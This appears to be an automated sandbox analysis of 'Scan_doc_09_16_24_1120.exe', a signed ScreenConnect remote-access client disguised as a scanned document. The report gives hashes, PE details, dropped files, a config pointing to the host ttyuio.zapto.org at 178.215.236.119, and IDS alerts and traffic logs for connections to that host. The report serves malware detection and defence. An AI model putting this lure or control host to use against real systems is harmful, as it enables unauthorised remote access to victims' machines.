                                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):81696
                                                                                                                                                                                                                                                                        Entropy (8bit):5.862223562830496
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                                                                                        MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                                                                                        SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                                                                                        SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                                                                                        SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):266
                                                                                                                                                                                                                                                                        Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):87
                                                                                                                                                                                                                                                                        Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1590
                                                                                                                                                                                                                                                                        Entropy (8bit):5.363907225770245
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):563
                                                                                                                                                                                                                                                                        Entropy (8bit):5.038578038992003
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a23%3a15</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                        Entropy (8bit):4.421566266250459
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):6.514553749500508
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                        File name:Scan_doc_09_16_24_1120.exe
                                                                                                                                                                                                                                                                        File size:83'368 bytes
                                                                                                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                        Entrypoint:0x401489
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                                        Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                                                                        Signature Valid:true
                                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                        Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                                                                        Error Number:0
Not Before:17/08/2022 02:00:00
Not After:16/08/2025 01:59:59
                                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                                        • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                                        Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                                                                        Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                                                                        Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                                                                        Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        call 00007FB06081F3BAh
                                                                                                                                                                                                                                                                        jmp 00007FB06081EE6Fh
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                                                                        call dword ptr [0040B048h]
                                                                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                        call dword ptr [0040B044h]
                                                                                                                                                                                                                                                                        push C0000409h
                                                                                                                                                                                                                                                                        call dword ptr [0040B04Ch]
                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                        call dword ptr [0040B050h]
                                                                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                        sub esp, 00000324h
                                                                                                                                                                                                                                                                        push 00000017h
                                                                                                                                                                                                                                                                        call dword ptr [0040B054h]
                                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                                        je 00007FB06081EFF7h
                                                                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                                                                        int 29h
                                                                                                                                                                                                                                                                        mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                                                                        mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                                                                        mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                                                                        mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                                                                        mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                                                                        mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                                                                        mov word ptr [004118D8h], ss
                                                                                                                                                                                                                                                                        mov word ptr [004118CCh], cs
                                                                                                                                                                                                                                                                        mov word ptr [004118A8h], ds
                                                                                                                                                                                                                                                                        mov word ptr [004118A4h], es
                                                                                                                                                                                                                                                                        mov word ptr [004118A0h], fs
                                                                                                                                                                                                                                                                        mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                                        pop dword ptr [004118D0h]
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                        mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                        mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                        mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                                                                        mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1060c | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x13000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x11800 | 0x2da8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x14000 | 0xddc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xfe38 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xfd78 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d58 | 0x5e00 | ec94ce6ebdbe57640638e0aa31d08896 | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.843224204192078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-02T06:23:00.190265+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 178.215.236.119 | 443 | 192.168.2.5 | 49722 | TCP
2024-10-02T06:23:01.313130+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 178.215.236.119 | 443 | 192.168.2.5 | 49723 | TCP
2024-10-02T06:23:05.234030+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 178.215.236.119 | 443 | 192.168.2.5 | 49729 | TCP
2024-10-02T06:23:06.357364+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 178.215.236.119 | 443 | 192.168.2.5 | 49731 | TCP
2024-10-02T06:23:07.756451+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 178.215.236.119 | 443 | 192.168.2.5 | 49734 | TCP
2024-10-02T06:23:08.886579+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 178.215.236.119 | 443 | 192.168.2.5 | 49739 | TCP
2024-10-02T06:23:11.300178+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 178.215.236.119 | 443 | 192.168.2.5 | 49742 | TCP
2024-10-02T06:23:13.032777+0200 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 178.215.236.119 | 443 | 192.168.2.5 | 49743 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.419116020 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.419485092 CEST44349705178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.419502020 CEST44349705178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.419584990 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.419589996 CEST44349705178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.419639111 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.420336962 CEST44349705178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.420397997 CEST44349705178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.420418978 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.420423985 CEST44349705178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.420460939 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.420485973 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.420485973 CEST44349705178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.420543909 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:53.424398899 CEST49705443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.000148058 CEST49709443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.000211954 CEST44349709178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.000308037 CEST49709443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.000802994 CEST49709443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.000817060 CEST44349709178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.630842924 CEST44349709178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.634324074 CEST49709443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.634371996 CEST44349709178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.927249908 CEST44349709178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.927270889 CEST44349709178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.927283049 CEST44349709178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.927675962 CEST49709443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.927711964 CEST44349709178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.927772045 CEST49709443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.927805901 CEST49709443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:54.929471016 CEST49709443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:59.118382931 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:59.118434906 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:59.118634939 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:59.119024992 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:59.119040012 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:59.747740030 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:59.757783890 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:22:59.757822037 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.018496990 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.018517971 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.018531084 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.018718958 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.018748999 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.018894911 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.104237080 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.104260921 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.104357958 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.104382992 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.104417086 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.104435921 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.105554104 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.105568886 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.105637074 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.105642080 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.105695963 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.190349102 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.190421104 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.190452099 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.190462112 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.190511942 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.191474915 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.191538095 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.191553116 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.191557884 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.191601992 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192429066 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192470074 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192504883 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192509890 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192542076 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192564011 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192568064 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192687988 CEST44349722178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.192821980 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.193845987 CEST49722443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.211448908 CEST49723443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.211555958 CEST44349723178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.211657047 CEST49723443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.212007046 CEST49723443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.212064981 CEST44349723178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.859975100 CEST44349723178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.862303019 CEST49723443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:00.862359047 CEST44349723178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:06.184900999 CEST44349731178.215.236.119192.168.2.5
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:06.184943914 CEST49731443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:06.184967995 CEST49731443192.168.2.5178.215.236.119
                                                                                                                                                                                                                                                                        Oct 2, 2024 06:23:06.270189047 CEST44349731178.215.236.119192.168.2.5
